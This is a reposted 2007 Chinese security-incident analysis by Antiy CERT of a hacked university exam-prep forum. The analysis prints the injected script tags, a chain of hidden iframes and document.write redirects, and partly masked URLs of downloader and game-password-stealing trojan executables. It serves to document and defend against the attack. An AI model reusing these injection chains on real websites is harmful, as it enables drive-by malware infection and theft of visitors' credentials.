设为首页
加入收藏
联系我们
   
   
文章搜索
精品推荐
分类导航
操作系统 佳软推介
冲浪宝典 办公专区
网页制作 网络安全
应用安全 黑客攻防
QQ空间
热门文章
· 怎样降低网吧运行成本
· 可免费升级一年的卡巴
· 只读更新全程图解教程
· 迅闪v4.5破解版[附教程
· 非主流18禁淫荡图片_非
· 网吧母盘的制作
· [西安]孙清云专门批示
· 详的XP母盘制作
· 网吧推出女性专区(图)
· 非主流梦幻少女的鞋鞋
· 玩酷FZL_彩绘酷型帽子
· 经典-唯美花儿银饰
· 新年绝美款日系Party鞋
· 韩式Feizl_可爱发饰
· 可爱公主_FZL糖果胸针
· 珍珠个性Fzl美饰
· 个性非主流挂坠
· 少女可爱零钱包挂件
相关文章
 人大代表建议建立上 
 广东全国人大代表称 
 澄海区团人大代表呼吁设举 
 人大代表建议通过手 
 华尔街14万人大裁员 
 人大代表建议——五年内应 
 QQ空间爱人大图模块:我心 
 《魔域》史上最大福 
 野蛮人大集合!《科 
 百人大战巨型BOSS《 
 [调研]全国人大调研组调研 
 全国人大代表赴浙江省调研 
 人大代表:建议手机 
 全国人大代表来萧调研网吧 
 人大常委建议让反垄 
 全国人大就文物保护法执法 
 石河子市人大心系下一代 春 
 人大代表称不良网络网吧猛 
 检察日报:全国人大代表呼 
 全国人大代表呼吁 取消所有 
 《暗黑之门:伦敦》 
 全国人大代表呼吁取消所有 
 电信旗下网站涉嫌网络赌博 
 电信旗下网站涉嫌网 
 人大常委:国家应研发青少年 
 十届全国人大常委会:对违 
 人大委员称未成年人 
 人大提案:将研发新技 
 人大代表拟明年1月递交严惩 
 人大代表是用来监督网吧的 
 北京十大《完美》妖 
 人大常委会审议:营业性网 
 三明:人大代表关注网吧问 
 运城:一网吧老板冒充人大 
 大连:人大代表昨日“逛” 
 厦门:人大代表政协委员随 
 重庆:“借”厕所不成 四人 
 两会:人大代表称网游精神 
 广东:省十届人大三次会议 
 IT形象代言人大盘点 




您当前的位置:西安网吧在线 -> 电脑技巧 -> 网络安全 -> 文章内容

人大考研论坛12月4日遭黑客挂马攻击

作者:佚名  来源:IT专家网  发布时间:2007-12-17 0:36:25  发布人:Cn029.Com

减小字体 增大字体

作者: 安天CERT,  出处:IT专家网, 责任编辑: 张帅, 
2007-12-04 18:54
  12月4日,人大考研论坛网站(http://www.rendaka****.cn)被黑客植入病毒,用户如果访问该网站,会被病毒感染。系统就会自动从恶意网站上下载并运行多个恶意程序,盗取用户信息……

  12月4日,人大考研论坛网站(http://www.rendaka****.cn)被黑客植入病毒,用户如果访问该网站,会被病毒感染。系统就会自动从恶意网站上下载并运行多个恶意程序,盗取用户信息。

  该网站的主页里被插入如下代码:

  

  插入代码

      <script src=http://sns***.com/pic></script><script   src=http://taoz****.com/pic></script>
  <script src=http://zzs***.cn/reg></script>

  1. http://sns***.com/pic地址失效
  2. http://zzs***.cn/reg 地址失效
  3. http://taoz****.com/pic插入框架代码:

      document.write("<div style='display:none'>")
  document.write("<iframe src=
  http://51la.wss****.com/31/5xx.htm?3></iframe>")
  document.write("<iframe src=
  http://www.foa***.info/ms44.htm?6326></iframe>")
  document.write("<iframe src=
  http://aa.lls****.com/ww/new05.htm?067?4></iframe>")
  document.write("<iframe src=
  http://www.900***.info/xm30.htm?258></iframe>")
  document.write("<iframe src=
  http://www.taozh***.com/pic/vd.htm></iframe>")
  document.write("<iframe   src=http://aa.llsg***.com/ww/new263.htm?id=015></iframe>")
  document.write("</div>")

       (1). http://51la.wss****.com/31/5xx.htm?3插入框架代码:

  

     <iframe src=http://qqq.wss****.com/gm.htm width=100 height=0></iframe>

      (1).http://qqq.wss****.com/gm.htm加密网马代码:

  

  下载文件: http://qqq.aishe****.com/down.exe

  (2).http://www.foa***.info/ms44.htm?6326框架代码:

  

      <iframe src="88/***.htm" width="20" height="0"
  frameborder="0"></iframe>

  <iframe src="88/***.htm" width="1" height="1"
  frameborder="0"></iframe>

  <iframe src="88/***.htm" width="100" height="0"
  frameborder="0"></iframe>

  (1).88/881.htm关键脚本代码:

   document.writeln("Cuteqq=\'http:\/\/60.190.101.***\/cd22.exe\';");
 下载文件: http://60.190.101.***/cd22.exe

  (2).88/***.htm加密网马代码:

  

  (3).88/***.htm脚本代码:

  

     <script language=javascript src=bb.js></script>

      bb.js关键脚本代码:

      document.writeln("document.write
  (\'<iframe width=100 height=100   src=\"http:\/\/www.foa***.info\/88\/bf.htm\"><\/iframe>\');");
  连接地址为:http://www.foa***.info/88/bf.htm
  http://www.foa***.info/88/bf.htm加密网马代码

   

  (3).http://aa.llsg****.com/ww/new05.htm?067?4框架代码:

  

      <iframe src=http://aa.lls****.com/aa/haha.htm
  width=5 height=5></iframe>
  <iframe src=http://aa.lls****.com/aa/pps.htm
  width=5 height=5></iframe>

  (1). http://aa.lls****.com/aa/haha.htm加密网马,

  下载http://down.lls****.com/bb/014.exe

  (2). http://aa.lls****.com/aa/pps.htm加密网马代码:

  

  (4).http://www.900***.info/xm30.htm?258框架代码:

  

      <iframe src="ee/***.htm" width="20" height="0"
  frameborder="0"></iframe>
  <iframe src="ee/***.htm" width="0" height="0"
  frameborder="0"></iframe>
  <iframe src="ee/***.htm" width="100" height="0"
  frameborder="0"></iframe>

     (1).ee/ee1.htm关键脚本代码:
  

      document.writeln("Cuteqq=\'http:\/\/60.190.101.***\/cd22.exe\';");
  下载文件: http://60.190.101.***/cd22.exe

      (2).ee/ee3.htm加密网马代码:

  

  (3).ee/***.htm脚本代码:

     
     <script language=javascript src=bb.js></script>

      bb.js关键脚本代码:
  
      document.writeln("document.write(\'<iframe width=100 
  height=100 src=\"http:\/\/www.900***.info\/ee\/bf.htm\">
  <\/iframe>\');

  连接地址为:http://www.900***.info/ee/bf.htm
        http://www.900***.info/ee/bf.htm加密网马代码:

  

  (5).http://aa.lls****.com/ww/new263.htm?id=015框架代码:

  

      <iframe src=http://aa.lls****.com/aa/haha.htm
  width=5 height=5></iframe>
  <iframe src=http://aa.lls****.com/aa/pps.htm
  width=5 height=5></iframe>

      (1). http://aa.lls****.com/aa/haha.htm
  加密网马:下载http://down.lls****.com/bb/014.exe
  (2). http://aa.lls****.com/aa/pps.htm加密网马代码:

  

  当用户访问http://www.rendaka****.cn时, 会调用以上恶意代码!

  使系统自动下载以下文件到本地,并运行:

      http://qqq.aishe****.com/down.exe
  病毒名(Worm.Win32.Downloader.bw) 蠕虫下载者
  http://60.190.101.***/cd22.exe
  病毒名(Worm.Win32.Downloader.bi) 蠕虫下载者
  http://down.lls****.com/bb/014.exe
  病毒名(Worm.Win32.Downloader.as) 蠕虫下载者
  下在成功运行木马将下载以下病毒到用户的系统,并运行。
  http://67.43.156.**/down/0.exe 地址失效
  http://67.43.156.**/down/1.exe 地址失效
  http://67.43.156.**/down/2.exe 地址失效
  http://67.43.156.**/down/3.exe 地址失效
  http://67.43.156.**/down/4.exe 地址失效
  http://67.43.156.**/down/5.exe 地址失效
  http://67.43.156.**/down/6.exe 地址失效
  http://67.43.156.**/down/7.exe 地址失效
  http://205.209.142.***/down/8.exe 地址失效
  http://205.209.142.***/down/9.exe 地址失效
  http://205.209.142.***/down/10.exe
  病毒名(Trojan-PSW.Win32.OnLineGames.jes) 盗号木马
  http://205.209.142.***/down/11.exe
  病毒名( Trojan-PSW.Win32.OnLineGames.jiz) 盗号木马
  http://205.209.142.***/down/13.exe
  病毒名( Trojan-PSW.Win32.OnLineGames.jgq) 盗号木马
  http://205.209.142.***/down/14.exe
  病毒名( Trojan-PSW.Win32.OnLineGames.jlc) 盗号木马
  http://205.209.142.***/down/15.exe 地址失效
  http://205.209.142.***/down/16.exe
  病毒名( Trojan-PSW.Win32.OnLineGames.jes) 盗号木马
  http://205.209.142.***/down/17.exe
  病毒名( Trojan-PSW.Win32.OnLineGames.jer) 盗号木马
  http://205.209.142.***/down/**.exe
  病毒名( Virus.Win32.AutoRun.aii) 感染运行病毒
  http://205.209.142.***/down/20.exe 地址失效
  http://205.209.142.***/down/21.exe 地址失效
  http://205.209.142.***/down/22.exe 地址失效
  http://205.209.142.***/down/24.exe 地址失效
  http://205.209.142.***/down/25.exe 地址失效
  http://205.209.142.***/down/26.exe 地址失效
  http://60.190.101.***/aa1.exe
  病毒名( Trojan-PSW.Win32.OnLineGames.ixl) 盗号木马
  http://60.190.101.***/aa2.exe 地址失效
  http://60.190.101.***/aa3.exe 地址失效
  http://60.190.101.***/aa4.exe 地址失效
  http://60.190.101.***/aa5.exe 地址失效
  http://60.190.101.***/aa6.exe 地址失效
  http://60.190.101.***/aa7.exe 地址失效
  http://60.190.101.***/aa8.exe 地址失效
  http://60.190.101.***/aa9.exe 地址失效
  http://60.190.101.***/aa10.exe 地址失效
  http://60.190.101.***/aa11.exe 地址失效
  http://60.190.101.***/aa12.exe 地址失效
  http://60.190.101.***/aa13.exe 地址失效
  http://60.190.101.***/aa14.exe 地址失效
  http://60.190.101.***/aa15.exe 地址失效
  http://60.190.101.***/aa16.exe 地址失效
  http://60.190.101.***/aa17.exe 地址失效
  http://60.190.101.***/aa**.exe 地址失效
  http://60.190.101.***/aa19.exe 地址失效
  http://60.190.101.***/aa20.exe 地址失效
  http://60.190.101.***/aa21.exe 地址失效
  http://60.190.101.***/aa22.exe 地址失效
  http://60.190.101.***/aa23.exe 地址失效
  http://60.190.101.***/aa24.exe 地址失效
  http://60.190.101.***/aa25.exe 地址失效
  http://qqq.dzy***.com/wm/wm/1.exe
  病毒名( Trojan-Dropper.Win32.Small.bbz) 辅助木马
  http://qqq.dzy***.com/wm/wm/2.exe
  病毒名( Trojan-PSW.Win32.OnLineGames.jbj) 盗号木马
  http://qqq.dzy***.com/wm/wm/3.exe 地址失效
  http://qqq.dzy***.com/wm/wm/4.exe
  病毒名( Trojan-PSW.Win32.OnLineGames.jfk) 盗号木马
  http://qqq.dzy***.com/wm/wm/5.exe
  病毒名( Trojan-PSW.Win32.OnLineGames.jjj) 盗号木马
  http://qqq.dzy***.com/wm/wm/6.exe
  病毒名( Trojan-PSW.Win32.OnLineGames.jbm) 盗号木马
  http://qqq.dzy***.com/wm/wm/7.exe
  病毒名( Trojan-PSW.Win32.Lmir.bpe) 盗号木马
  http://qqq.dzy***.com/wm/wm/8.exe
  病毒名( Trojan-PSW.Win32.OnLineGames.jmi) 盗号木马
  http://qqq.dzy***.com/wm/wm/9.exe
  病毒名( Trojan-PSW.Win32.OnLineGames.ixn) 盗号木马
  http://qqq.dzy***.com/wm/wm/10.exe 地址失效
  http://qqq.dzy***.com/wm/wm/11.exe 地址失效
  http://qqq.dzy***.com/wm/wm/12.exe 地址失效
  http://qqq.dzy***.com/wm/wm/13.exe 地址失效
  http://qqq.dzy***.com/wm/wm/14.exe 地址失效
  http://qqq.dzy***.com/wm/wm/15.exe 地址失效
  http://qqq.dzy***.com/wm/wm/16.exe 地址失效
  http://qqq.dzy***.com/wm/wm/17.exe 地址失效
  http://qqq.dzy***.com/wm/wm/**.exe 地址失效
  http://qqq.dzy***.com/wm/wm/19.exe
  病毒名( Trojan-Downloader.Win32.Cryptic.ic) 下载者木马
  http://qqq.dzy***.com/wm/wm/20.exe 地址失效



声 明: 西安网吧在线(Cn029.Com) 所发表的文章与图片仅代表作者本人观点,与本站立场无关,
也不构成任何建议。对本文有任何异议,请联络: webmaster@cn029.com
若文章内容侵犯了您的相关权益,请及时与我们联系,我们会及时处理,感谢您对本站的支持!

[] [返回上一页] [打 印] [收 藏]
    ∷相关文章评论∷ (评论内容只代表网友观点,与本站立场无关!)查看完整评论内容
    文章评论     请注意用语文明且合法,不要发布带有攻击性的言论,谢谢合作!!
用户名
分  值
100分 80分 50分 10分 0分
评  论
  (注“”为必填内容。)